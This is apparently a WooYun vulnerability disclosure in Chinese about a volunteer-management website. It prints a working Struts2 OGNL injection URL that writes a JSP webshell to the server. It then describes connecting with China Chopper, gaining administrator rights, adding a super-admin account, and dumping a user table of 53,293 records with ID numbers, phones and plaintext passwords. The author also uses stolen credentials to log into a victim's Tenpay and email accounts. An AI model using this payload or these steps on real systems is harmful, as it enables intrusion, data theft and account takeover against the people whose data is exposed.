WooYun.org

地址：http://**.**.**.**/guest/index.action
注意主页请求是以.action结尾的，那就试试struts漏洞呗。
http://**.**.**.**/guest/index.action?redirect:${ %23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'), %23p%3d(%23req.getRealPath(%22/%22)%2b%22config.jsp%22).replaceAll("\\\\", "/"),new+**.**.**.**.BufferedWriter(new+**.**.**.**.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close() }&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+**.**.**.**.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
小马注入后，再构造一个custom.html，其中form action的路径指向小马
用浏览器打开custom.html，将dama.jsp中内容复制到文本框中，然后点击提交。

菜刀连上看看

执行命令看看权限

不试不知道，一试吓一跳！直接拿到服务器最高管理员权限，想干嘛都行了。新增个超级管理员，远程上去看看。

下面介绍一下该项目：
1、项目历时一年，课题组根据巴中市文明城市创建工作的需要，针对巴中实际，在文献搜集、理论分析、现场考察、广泛借鉴国内外志愿者先进管理经验的基础上形成的最终成果

2、首页捐款账户可直接篡改

3、每分钟10个用户注册

4、拿到数据库分配积分，商品可直接兑换

5、进入后台看看，这个主要做权限管理的

6、还是双后台哦，看看这个做内容管理的

来看看数据库吧

直接看用户表，身份证、邮箱、手机，密码都是明文存储。

截止提交为止，53293用户，还在以每分钟10个用户不断增长。
随便找个用户登录她的财付通看看

再换个用163邮箱注册的用户，试试163邮箱

还有用国家统计局的邮箱注册的，太敏感了。就不放出来了。